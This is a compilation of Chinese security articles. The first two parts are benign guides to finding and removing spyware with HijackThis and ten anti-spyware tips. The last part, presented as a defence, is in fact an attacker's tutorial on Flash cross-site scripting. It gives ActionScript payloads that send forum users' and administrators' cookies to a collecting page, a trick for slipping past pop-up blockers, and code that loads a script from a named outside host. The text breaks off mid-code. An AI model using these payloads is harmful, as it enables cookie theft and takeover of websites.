系统安全知识——如何准确检测出你电脑上的间谍软件

系统安全知识 ——如何准确检测出你电脑上的间谍软件 前言 你应该有过这样的遭遇，就是电脑感染上了间谍软件或广告软件。在这种情况下，解决问题的关键就是要在你的硬盘、内存或Windows注册表中找出间谍软件的所在。我最近研究了我的主要网络内的几台机器，以找到间谍软件和广告软件的感染信息。我个人建议，最好能利用一些有效的商业软件和免费软件经常进行这样的检查。 下面介绍一下步骤： 1.在使用某种商业软件或免费软件的工具检查之前，尽可能的将机器清理干净。运行防病毒软件或反间谍软件扫描，一旦发现一些异常的项目立即清除。有关这一主题的内容在网络上有许多。需要注意的是，在进入下一步之前，专家们强烈建议使用并运行一种以上的杀毒、反间谍软件扫描以便达到彻底清理。 　　2.建立一个检查点或者对系统作备份。如果你使用的是Windows XP，那再方便不过了，这样很快就能建立一个系统恢复点（依次打开：开始菜单――帮助和支持――使用系统还原恢复你对系统的改变，然后点击创建一个还原点的按钮）。当然还有其他的（对于那些使用Windows家族其他操作系统的人来说是唯一的方法）就是创建一整套系统的备份，包括系统状态信息（如果其他办法都不可行的话，你可以使用NTBackup.exe文件；他包含了所有Windows新版本的信息）。这样的话，万一在接下来的步骤中出了差错，还可以将您的系统恢复到前一个正确的状态。 　　3.关闭所有不必要的应用程序。一些反间谍软件从电脑运行的所有线程和注册表中查找不正常迹象，因此先退出所有应用程序再启动反间谍程序运行检查，可以节省大量时间。 　　4.运行反间谍程序。在这一步，我使用了Hijack This这个软件。将下载回来的Zip文件解压到你想要的目录，然后双击HijackThis.exe这个执行文件，会跳出一个带有提示“Do a system scan and save a logfile.”的窗口。默认状态下，日志文件会保存在“我的文档”中，我发现在保存的日志文件名称中加入日期和时间信息很有用，这样的话，一个名为hijackthis.log的文件就改名为hijackthis-yymmdd:hh.mm.log（hh.mm是24小时制的几点几分）。这样的话，以后你任何时候再次运行Hijack This（一旦开始运行，它会自动清空以前的日志），都不必担心丢失以前的日志。因此，时间标记不愧是个很好的方法，这对将来你的日志文件分析非常有用。 　　5.查看Hijack This结果窗口中显示的扫描结果。这个结果与写入日志文件的信息是相同的，并且你会发现在每一个项目的左边都有一个复选框。如果你核选了某些项目，按下“Fix Checked“按钮， Hijack This就可以将其彻底清除了。你会发现在那里有很多看上去秘密的文件，你可以对其进行快速扫描，以决定在这时采取何种操作。实际上，真正存在的问题是识别出哪些文件具有潜在的威胁，哪些是必须的，而哪些是无关紧要的。此时分析工具能够帮上我们的大忙。记住，现在不要关闭Hijack This的查找结果窗口，也不需要进行核选操作，因为在接下来的步骤中我们还会返回这个窗口。 　　·具体方法 　　6.用Hijack This的日志分析程序运行你的日志文件。你可以使用 Help2Go Detective或者 Hijack This Analysis 这两个分析工具中的一个。如果两个软件都有的话，我个人倾向于Help2Go Detective，但这两个都值得一试。在Hijack This日志里，你会发现每一个入侵（线程）的特殊信息和相关处理建议，包括哪些可以保留，哪些可以删除（但却是无害的），哪些是可疑文件（或许应该删除，但是还需要进一步分析研究），以及哪些必须删除（因为确定是恶意病毒）。这时，你可疑检查所有被确认为恶意病毒的选项，或者与已知的间谍软件和广告软件有关的选项。         　　7.检查可疑项目（包括可选的激活项目）。有时你可以查看注册表名称或者相关文件和目录信息，来检查即使通过分析程序（使用Hijack This很明显发现的）也没有识别出的项目，这是可能是你故意安装或使用的程序的一部分。这些项目经常会被单独的遗留下来。如果检查程序和你人为的都没有发现这些项目，安全选项就会将它们备份然后删除（然而如果你采取了这个步骤，那么要挽救这种状况只有存储一份备份文件或者返回到前一个恢复状态。）如果你想知道你在查看的是什么文件，就进入下一个附加步骤，用google或其他搜索工具搜索项目的名称。在99%的情况下我都可以在两分钟或更少时间内作出批准与否的决定。只有一少部分项目，最显著的是dll文件不仅仅需要通过文件名的搜索验证来裁留。     8.在Hijack This结果窗口核选有害文件和不确定的可疑项目，然后按下“Fix checked”按钮。你也可以在结果窗口中滚动查看项目，并通过单击来高亮选择单独的项目，接着通过点击"Info on selected item…."（选中项目的信息……）来获取这些项目的额外信息。这时来查看这些信息比在上一步骤查看更合适，因为这时分析工具的速度更快而且面向对象更友好。 　　9.重启系统查看运行情况。如果系有统运行不正常现象，如应用程序不工作或变得异常，或者系统看上去不太对劲时，你需要决定是否需要返回到恢复状态或备份状态。如果Windows不能完成启动，在系统启动之初按下F8键，直到启动进入安全启动菜单，选择最后一次正确的配置。这样启动就没有问题了，系统启动之后你还需要退回到恢复点，或者恢复到在第二步备份的状态。如果你接收这个选项的话，就不需要保存改动了，可以直接越过第10步。 　　10.最后再运行依次Hijack This扫描：重复步骤4，但是需要注意更改保存日志文件的日期标签。你可以扫描结果来确定移动的项目已经被彻底清除，或者只需保存你电脑状态的快照，快速清除就可以了（这样会对下一次进行同样的操作产生一个有意义的参照状态）。 ——轻松制服顽劣的间谍软件 最新的调查显示了反间谍软件软件工具的不足，“间谍”仍在网络上肆无忌惮地活动。但也不必垂头丧气，学习并遵循以下的十招办法，间谍软件将对你束手无策。 　 　　有的时候，真理和善良总是受到伤害，我们刚刚在反垃圾资讯中心" 邮件上取得了一些进展，然而，间谍软件却又将填补这项空白。未来几年里，你将不得不耗费宝贵的时间，在工作中、在家里与间谍软件作斗争。 　　 　　虽然市面上有数十种新的反间谍软件工具供我们使用，而且这些资讯中心" 程序确实很有帮助，但是，运行反间谍软件实用程序只是解决的一部分，还有很多其他事情需要你做，请按照我们提供的10个步骤开始行动吧。 　　1. 了解你的敌人 　　 　　如果天真地把间谍软件定义为Web网站留下来的小cookie文件的话，那么你的挫折将永无止境。所有类型的变脸软件(Scumware)都将为你带来不幸，主要的四大类型是： 　　 　　间谍软件（Spyware）是一种可以秘密地收集有关你计算机信息的软件，并可能向未知网站发送数据，包括“键盘记录软件”或“按键捕获寄生虫”(不要与“恶意软件(malware)”混淆，恶意软件包括病毒、蠕虫和特洛伊木马程序)。 　　 　　广告软件（Adware）：一种可以随机或者根据当前浏览器内容弹出广告和条幅的软件。 　 　　劫持软件(Hijackers)：可以改变浏览器主页、缺省搜索引擎，甚至改变你的方向，使你无法到达你想到达的网站。 　 　　小甜饼文件(Cookies)：可以跟踪Web网站参数选择和口令的小型文件。软件可以在用户不知道的情况下收集和扩散该信息。 　 　　以上四种类型中，广告软件最讨厌，而劫持软件和间谍软件却是危害最大的。 　　 　　2. 退出Internet Explorer 　　我们无法指控资讯中心微软公司犯下了生成间谍软件的罪行。但是，Windows的设计，而且尤其是Internet Explorer却肯定使微软公司成了“间谍”的“同谋”。我们鼓励用户转向其他产品，例如Firefox或者Opera，两者均缺省设置封锁弹出文字。Firefox是免费的且已很普及，Opera则需要花几美元。 　　 　　需要证据来证明Internet Explorer存在着问题？在笔者运行Windows XP Home的主要测试PC上，使用Internet Explorer和Outlook Express，结果发现了739个间谍软件。 　　而在笔者的个人PC上，运行Firefox和Mozilla公司的Thunderbird电子邮件应用，结果才发现了11个间谍软件范例。而且，这11个间谍软件均是在笔者不得不使用Internet Explorer进入某些Web网站的时候，偷偷溜进这台PC的。 　　然而，不幸的是，有些网站却需要Internet Explorer，而那些与微软公司的Outlook电子邮件客户端有密切联系的用户也必须使用它。不过，还是有办法可以把感染Internet Explorer间谍软件的速度降下来。首先，禁止微软 ActiveX支持。在Internet Explorer里，点击Tools→Internet Options→Security→Custom Level，然后，点击迫使ActiveX控制在运行之前请求允许的检查框。 　 　　其次，安装Google Toolbar，它也可以封锁弹出文字。它适用于Internet Explorer 5.5及更高级产品，因此，你或许还需要升级浏览器。同样地，也可以运行只在Internet Explorer之内工作的弹出文字封锁软件，如StopZilla、12资讯中心" 3Ghosts Popup Killer、Ad Killer、Ad Muncher以及Anti Popup Pro。 　　 　　3. 阻止下载 　　 　　仔细遵守如下要求：千万不要让技术新手尝试下载任何东西。然后，为他们下载并安装Google Toolbar。 　 　　用户希望从Web上下载“免费”程序，但是，请教会他们如何区分为了获得实用程序而访问的网站(如PCWorld.com或Tucows.com )，与出现在弹出广告和垃圾邮件里的网站。 　 　　下定决心，千万别泄气，接受教育是不完善的这个事实。间谍软件传播者在说服人们下载间谍软件方面通常做的比你更好。所以，有必要对用户解释清楚，在浏览器页面旁边看起来象广告或朋友发给他们的那些链接，实际上是间谍软件散播的最常见方式。 　　提醒你的用户对一些危险信号一定要敏感，如弹出的条幅广告说可以提供免费间谍软件检查(这是对信任的最残酷的滥用)。 　 　　 　　4. 教授备份和恢复的基本知识 　 　　由于许多用户不会留意你的警告，因此，应该教会他们如何从灾难当中恢复过来。如今，人们在计算机上有太多的东西，以致于他们懒得做各种备份选择。 存满备份数据的外部磁盘、磁带系统或CD可以减轻充斥着间谍软件的系统所带来的麻烦，并使其回到早期没有间谍软件的情况，从而使一切恢复正常。 　 　　教会用户如何在XP里生成恢复点，以及如何在每次从非知名网站下载之前设置一个恢复点。在大多新式的PC上，磁盘空间不是问题，而且，即使它们的资讯中心" 硬盘存满了东西，创造一些恢复点也比清除间谍软件感染容易得多。 　　5. 制作一张 反间谍软件CD 　　 　　把反间谍软件实用程序烧录到你的CD上，制作自己的间谍软件工具集也是个不错的办法。当你需要清除间谍软件时，寻找和等待工具软件的下载很浪费时间，CD-ROM磁盘目前价格很低廉，因此，多制作一些拷贝并把它们送给你的用户也是有效的手段。 　　就笔者自己而言，有三个免费的实用程序，还有三个商业实用程序的测试版本。这些程序的容量为2M至10M字节，因此，CD上有足够的空间容纳它们。 　　6. 运行至少两种间谍软件清除程序 　 　　根据我们的经验，没有任何一种间谍软件清除程序能够清除恶意代码的每一部分。所有实用程序都有盲点，而间谍软件编程人员却正好可以利用这些盲点。每家厂商都称其产品可以捕获所有的东西，但是，不管何时人们用一种反间谍工具清除100项威胁的时候，另一个工具还能再找出另外十几项威胁。 　　每一种间谍软件清除程序都会检查注册表，但是，由于间谍软件遵循微软的注册表词条规则，因此，它根本不可能完全清除间谍软件。 　 　　定期运行多个不同的实用程序，并确信它们都是最新的，做到这一点十分重要。付费清除程序可以提供更持续的文件更新，即使免费件也会定期增加一些新功能。运行，更新，再运行，再更新，对付间谍软件就要不断重复上述步骤。笔者的一般做法是：清除系统，重新启动进入安全模式，然后，使用另一种工具进行清除，然后，再重新启动。　　 　　7. 封堵桌面通信漏洞 　 　　每一次间谍软件上传信息都意味着更多的未来问题，因为间谍软件可以进行自我更新，并增加新“性能”。封锁出站信息可以提高用户安全等级。 　　 　　有一些（但不是全部）常驻反间谍软件实用程序可以封锁间谍软件上载，商用产品更好一些。不过，安装个人防火墙同样可以封锁上载。ZoneAlarm和Sygate Personal Firewall都很棒。 　　 　　如今出售的几乎所有品牌路由器都包括防火墙保护。寻找可以对入站和出站信息包进行全状态检查的产品。个人防火墙和路由器控制的组合并非大材小用，尤其是对于那些无法抵制各种新鲜网站诱惑的用户来说更有必要。 　 　　8. 处理DRM 　　 　　在未来几年里，间谍软件还将继续存在的一个原因就是，各公司都在增加数字权利管理（DRM）在娱乐文件以及授权许可文件之上的使用。为这些应用留下的漏洞还将被间谍软件利用好几年的时间。跟踪诸如在线商店回头客之类的Cookie文件使得Web网站更人性化。但问题是，这些Cookie文件看起来很像间谍软件，从而很难在不杀死正常文件的情况下做出分辨。 　 　　对于新出现的娱乐播放应用情况也是一样，你下载的MP3音乐文件需要确认你有在移动设备上播放这些文件的权力，而新的反间谍软件有可能封锁对授权数据库进行的DRM查询，因为这不就是符合未经许可把系统信息发送给第三方的间谍软件定义吗？这一定义适用于商业应用许可文件和DRM应用许可文件等，至少在应用接口水平是这样。 　　 　　一种解决办法就是避免音乐播放程序之类的DRM应用，如果喜欢音乐，那么寻找一种能够定期更新其间谍数据库的反间谍软件，因为它可以协调好保护与音乐服务。 　　 　　9. 充分发挥AOL成员资格的优势 　　 　　供AOL成员免费下载的间谍软件保护是另一项非常有用的添加产品，笔者发现其扫描速度虽然比其他许多间谍软件清除程序慢，但是，该程序却在CounterSpy和SpyBot进行清除之后又发现了另外7个间谍软件范例。 　　 　　AOL还为用户提供一些非常有价值的保护，包括为其成员提供免费的技术支持。 　　 　　10. 推荐Macintosh或Linux系统 　　 　　间谍软件主要攻击微软操作系统，通过Internet Explorer漏洞进入并隐藏在Windows的薄弱之处。有些间谍软件，尤其是恶意Cookie文件，可以在任何浏览器之内发生作用，但是，这只是间谍软件当中很小的一部分。 　　 　　微软的一些软件产品，如Internet Explorer、word、Outlook和Media Player，一旦下载就将自动执行，从而使间谍软件很容易乘虚而入。Linux和Mac操作系统不允许这种自动执行，从而使它们更易抵制间谍软件。 　　更重要的是，Windows允许任何用户（或间谍软件）把动态链接库装载至内核之中，Linux的系统访问却要求拥有与之相对应的管理员特权。虽然这个办法不适合大多数人，但是，如果确实因为间谍软件变得太痛苦的话，那么，Apple和Linux将会非常欢迎你 ——如何防止Flash跨站攻击弹出IE窗口 一般来说大家在进行Flash跨站攻击时都是自己做一个Flash动画，并在第一帧中加入用于跳转到其他URL的AtionScript脚本函数，如下: 　　getURL("JavaScript:window.open('http://用于收集Cookie的网页地址?'+document.cookie)","_self") 　　然后把这个Flash动画置于论坛中的签名、贴子或短信消息中，用来获得管理员或用户的Cookie，从而得到管理权限，进一步伺机控制整个站点,最终达到自己的目的。我们可以看到在整个跨站攻击中最重要的就是这个AtionScript脚本啦!也就是这个脚本中用到的代码打开了一个我们又爱又恨的窗口，所以我们也只能从改造这个脚本代码来实现隐藏或者是去掉弹出的IE窗口，除此外别无它法! 　　我们先分析一下上面的AtionScript脚本，它使用AtionScript脚本函数"getURL"跳转到一个使用JavaScript协议的URL(JavaScript协议后面就是我们非常熟悉的JavaScript脚本代码)，在JavaScript中使用document.cookie的到Cookie，并把Cookie和一个用于收集Cookie的网页地址连成一个http协议的URL地址，最后使用window.open打开合成的URL地址，从而把Cookie用GET方式发送到用于收集Cookie的网页，并记录下来。 　　通过上面的分析我们进一步了解那个弹出的IE窗口是由于JavaScript协议中的代码window.open所生成的，相信大家都知道window.open的第二个参数用来指定打开的窗口的名字，其通用名称有"_media (IE6.0 在浏览器左边的媒体面板内打开)"、"_blank (在新窗口中打开)"、"_parent (在当前框架的父框架内打开。假如当前框架无父框架，此参数值等同于 _self)"、"_search (IE5.0 在浏览器左边的搜索面板内打开)"、"_self(在当前窗口中打开，覆盖当前文档)"、"_top (在所有框架之外的最顶层窗口中打开 。假如当前窗口无框架结构，此参数值等同于 _self )"等几种，如果我们以"_search"来打开窗口，不是就没有了弹出的IE窗口了吗?AtionScript脚本改为: 　　getURL("JavaScript:window.open('http://用于收集Cookie的网页地址?'+document.cookie,'_search')","_self") 　　当然，这样做会打开搜索面板，也会引起怀疑，但却可以躲过那些关闭弹出窗口软件的追杀!姑且也算一种方法吧! 　　如果仅仅是上面所说的，相信不少读者要把我。。。。。。 　　看到这里聪明的你是不是想到了点解决的思路?对!既然支持JavaScript啦，还有啥东东会不能解决呢?JavaScript真的是好处多多呀! 　　如果你曾看了我的那篇"打造一个完美的IE网页木马"的文章，并且你对其中的代码深深理解的话，你可以自己先去想象一下啦!呵呵...... 　　在那篇文章中有下面这样一段代码: 　　jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(/\//g,'//'); 　　window.open("file:javascript:document.all.tags('SCRIPT')[0].src='"+jsurl+"';eval();","icyfoxlovelace"); 　　使用了javascript协议把自己网站上的一个js代码文件插入到了本地文件中，同样的道理我们也可以用它把一个js代码文件插入到进行跨站攻击的论坛网页中，相应的AtionScript脚本改为: 　　getURL("JavaScript:document.all.tags('SCRIPT')[0].src='http:\/\/www.godog.y365.com\/wodemuma\/icyfox.js';eval();","_self") 　　其中icyfox.js得内容如下: 　　cookieurl="http://用于收集Cookie的网页地址?cookie="+escape(document.cookie); 　　/*这里使用了escape()对cookie编码，用来防止cookie中的一些特殊字符*/ 　　document.body.insertAdjacentHTML('beforeEnd','